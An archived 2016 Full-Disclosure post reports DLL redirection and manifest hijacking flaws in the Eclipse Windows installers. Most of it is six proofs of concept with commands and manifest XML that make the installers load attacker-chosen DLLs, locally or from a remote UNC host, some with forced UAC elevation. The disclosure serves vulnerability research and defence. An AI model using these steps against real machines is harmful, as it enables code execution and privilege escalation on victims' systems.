lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sat, 23 Jul 2016 13:08:55 +0200 From: "Stefan Kanthak" <stefan.kanthak@...go.de> To: <fulldisclosure@...lists.org> Cc: bugtraq@...urityfocus.com Subject: [FD] Executable installers are vulnerable^WEVIL (case 37): eclipse-inst-win*.exe vulnerable to DLL redirection and manifest hijacking Hi @ll, this is a followup to "case 36" (posted as "case 35" by mistake), <http://seclists.org/bugtraq/2016/Jul/82>. Proof of concept #1: ~~~~~~~~~~~~~~~~~~~~ 1. On a 64-bit edition of Windows download the 32-bit and 64-bit executable installers "eclipse-inst-win32.exe" and "eclipse-inst-win64.exe", save them in an arbitrary directory. 2. Create the (empty) files "eclipse-inst-win32.exe.local" and "eclipse-inst-win64.exe.local" in the directory where you saved the downloaded installers: Copy NUL: eclipse-inst-win32.exe.local Copy NUL: eclipse-inst-win64.exe.local 3. Create empty files kernel32.dll, kernelbase.dll, advapi32.dll, msvcrt.dll, ..., version.dll in the directory where you saved the downloaded installers. 4. Execute the downloaded installers. DOSSED! 5. Replace the empty DLLs created in step 3 with (malicious) DLLs of your choice. 6. Execute the downloaded installer which matches the processor architecture of the DLLs placed in step 5. PWNED! Proof of concept #2: ~~~~~~~~~~~~~~~~~~~~ 1. On a 64-bit edition of Windows download the 32-bit and 64-bit executable installers "eclipse-inst-win32.exe" and "eclipse-inst-win64.exe", save them in an arbitrary directory. 2. Create the subdirectories "eclipse-inst-win32.exe.local" and "eclipse-inst-win64.exe.local" in the directory where you saved the downloaded installers. 3. Copy any (malicious) DLL of your choice as kernel32.dll, kernelbase.dll, advapi32.dll, msvcrt.dll, ..., version.dll into the subdirectories created in step 2 (32-bit DLLs into "eclipse-inst-win32.exe.local", 64-bit DLLs into "eclipse-inst-win64.exe.local"). 4. Execute the downloaded installers. DOSSED or PWNED! Proof of concept #3: ~~~~~~~~~~~~~~~~~~~~ 1. On a 64-bit edition of Windows download the 32-bit and 64-bit executable installers "eclipse-inst-win32.exe" and "eclipse-inst-win64.exe", save them in an arbitrary directory. 2. Create the junctions "eclipse-inst-win32.exe.local" and "eclipse-inst-win64.exe.local" in the directory where you saved the downloaded installers: MkLink /J eclipse-inst-win32.exe.local %SystemRoot%\System32 MkLink /J eclipse-inst-win64.exe.local %SystemRoot%\SysWow64 3. Execute the downloaded installers. DOSSED! 4. Create the two junctions to directories with malicious DLLs of your choice if you want to get pwned instead. 5. Execute the downloaded installers. PWNED! Proof of concept #4: ~~~~~~~~~~~~~~~~~~~~ 1. On a 64-bit edition of Windows download the 32-bit and 64-bit executable installers "eclipse-inst-win32.exe" and "eclipse-inst-win64.exe", save them in an arbitrary directory. 2. Create the files "eclipse-inst-win32.exe.manifest" and "eclipse-inst-win64.exe.manifest" with the following contents in the directory where you saved the downloaded installers: --- eclipse-inst-win*.exe.manifest --- <?xml version="1.0" encoding="US-ASCII" standalone="yes"?> <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1"> </assembly> --- EOF --- 3. Execute the downloaded installers. DOSSED! Proof of concept #5: ~~~~~~~~~~~~~~~~~~~~ 1. On a 64-bit edition of Windows download the 32-bit and 64-bit executable installers "eclipse-inst-win32.exe" and "eclipse-inst-win64.exe", save them in an arbitrary directory. 2. Create the files "eclipse-inst-win32.exe.manifest" and "eclipse-inst-win64.exe.manifest" with the following contents in the directory where you saved the downloaded installers: --- eclipse-inst-win*.exe.manifest --- <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator"/> </requestedPrivileges> </security> </trustInfo </assembly> --- EOF --- 3. Execute the downloaded installers: Windows "user account control" will prompt for elevation, all hijacked DLLs will be executed with administrative privileges. PWNED! Proof of concept #6: ~~~~~~~~~~~~~~~~~~~~ 1. On a 64-bit edition of Windows download the 32-bit and 64-bit executable installers "eclipse-inst-win32.exe" and "eclipse-inst-win64.exe", save them in an arbitrary directory. 2. Create the files "eclipse-inst-win32.exe.manifest" and "eclipse-inst-win64.exe.manifest" with the following contents in the directory where you saved the downloaded installers: --- eclipse-inst-win32.exe.manifest --- <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1"> <file loadFrom="\\127.0.0.1\ADMIN$\System32\Kernel32.Dll" name="Kernel32.Dll" /> </assembly> --- EOF --- --- eclipse-inst-win64.exe.manifest --- <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1"> <file loadFrom="\\127.0.0.1\ADMIN$\SysWoW64\Kernel32.Dll" name="Kernel32.Dll"/> </assembly> --- EOF --- Optionally add more <file> elements for other DLLs loaded by the installers as you like. 3. Execute the downloaded installers. DOSSED! 4. Replace the UNC pathnames to your own host with UNC paths to any host reachable from your network where you placed some malicious DLLs to get pwned instead. 5. Execute the downloaded installers. PWNED! 6. Add the <trustinfo> element from poc#5 to achieve remote code execution with (user-assisted) escalation of privilege. 7. Execute the downloaded installers. PWNED²! stay tuned Stefan Kanthak _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists